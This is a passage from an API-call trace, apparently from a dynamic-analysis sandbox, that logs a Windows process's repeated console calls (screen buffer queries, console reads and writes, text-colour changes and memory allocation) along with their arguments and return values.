GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.437] GetConsoleOutputCP () returned 0x1b5 [0351.437] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.437] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.438] CoTaskMemFree (pv=0x1a8ad510) [0351.438] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280b5ac*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280b5ac*, lpNumberOfCharsWritten=0x1b62da58*=0x47) returned 1 [0351.439] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.439] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.440] GetConsoleOutputCP () returned 0x1b5 [0351.440] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.440] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.441] CoTaskMemFree (pv=0x1a8ad510) [0351.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.441] GetConsoleOutputCP () returned 0x1b5 [0351.442] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.442] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.443] CoTaskMemFree (pv=0x1a8ad510) [0351.443] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.444] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.444] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.445] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.446] GetConsoleOutputCP () returned 0x1b5 [0351.446] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.446] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.447] CoTaskMemFree (pv=0x1a8ad510) [0351.447] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.447] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.448] GetConsoleOutputCP () returned 0x1b5 [0351.449] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.449] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.449] CoTaskMemFree (pv=0x1a8ad510) [0351.449] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.450] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.450] GetConsoleOutputCP () returned 0x1b5 [0351.450] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.450] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.451] CoTaskMemFree (pv=0x1a8ad510) [0351.451] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.453] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.453] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.453] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.454] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.455] GetConsoleOutputCP () returned 0x1b5 [0351.455] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.455] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.456] CoTaskMemFree (pv=0x1a8ad510) [0351.456] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280d2ac*, nNumberOfCharsToWrite=0x77, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280d2ac*, lpNumberOfCharsWritten=0x1b62da58*=0x77) returned 1 [0351.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.457] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.457] GetConsoleOutputCP () returned 0x1b5 [0351.458] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.458] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.459] CoTaskMemFree (pv=0x1a8ad510) [0351.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.460] GetConsoleOutputCP () returned 0x1b5 [0351.460] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.460] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.462] CoTaskMemFree (pv=0x1a8ad510) [0351.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.462] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.463] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.463] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.464] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.464] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.464] GetConsoleOutputCP () returned 0x1b5 [0351.465] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.465] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.466] CoTaskMemFree (pv=0x1a8ad510) [0351.466] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.466] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.467] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.467] GetConsoleOutputCP () returned 0x1b5 [0351.467] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.467] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.468] CoTaskMemFree (pv=0x1a8ad510) [0351.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.469] GetConsoleOutputCP () returned 0x1b5 [0351.469] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.469] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.470] CoTaskMemFree (pv=0x1a8ad510) [0351.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.471] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.472] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.472] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.472] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.474] GetConsoleOutputCP () returned 0x1b5 [0351.475] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.475] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.475] CoTaskMemFree (pv=0x1a8ad510) [0351.475] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280d5a4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280d5a4*, lpNumberOfCharsWritten=0x1b62da58*=0xf) returned 1 [0351.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.477] GetConsoleOutputCP () returned 0x1b5 [0351.477] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.477] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.478] CoTaskMemFree (pv=0x1a8ad510) [0351.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.479] GetConsoleOutputCP () returned 0x1b5 [0351.479] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.479] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.480] CoTaskMemFree (pv=0x1a8ad510) [0351.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.480] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.481] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.481] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.482] GetConsoleOutputCP () returned 0x1b5 [0351.483] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.483] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.483] CoTaskMemFree (pv=0x1a8ad510) [0351.483] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.485] GetConsoleOutputCP () returned 0x1b5 [0351.485] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.485] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.486] CoTaskMemFree (pv=0x1a8ad510) [0351.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.486] GetConsoleOutputCP () returned 0x1b5 [0351.487] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.487] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.487] CoTaskMemFree (pv=0x1a8ad510) [0351.487] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.488] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.488] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.497] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.497] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.497] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.498] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.498] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.499] GetConsoleOutputCP () returned 0x1b5 [0351.499] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.499] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.500] CoTaskMemFree (pv=0x1a8ad510) [0351.500] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280b77c*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280b77c*, lpNumberOfCharsWritten=0x1b62da58*=0x41) returned 1 [0351.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.501] GetConsoleOutputCP () returned 0x1b5 [0351.501] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.501] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.502] CoTaskMemFree (pv=0x1a8ad510) [0351.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.503] GetConsoleOutputCP () returned 0x1b5 [0351.503] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.503] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.504] CoTaskMemFree (pv=0x1a8ad510) [0351.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.504] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.505] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.506] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.506] GetConsoleOutputCP () returned 0x1b5 [0351.507] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.507] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.507] CoTaskMemFree (pv=0x1a8ad510) [0351.507] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.509] GetConsoleOutputCP () returned 0x1b5 [0351.509] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.509] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.510] CoTaskMemFree (pv=0x1a8ad510) [0351.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.510] GetConsoleOutputCP () returned 0x1b5 [0351.511] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.511] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.512] CoTaskMemFree (pv=0x1a8ad510) [0351.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.513] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.514] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.514] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.514] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.515] GetConsoleOutputCP () returned 0x1b5 [0351.516] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.516] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.516] CoTaskMemFree (pv=0x1a8ad510) [0351.516] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280b81c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280b81c*, lpNumberOfCharsWritten=0x1b62da58*=0x1) returned 1 [0351.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.518] GetConsoleOutputCP () returned 0x1b5 [0351.518] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.518] 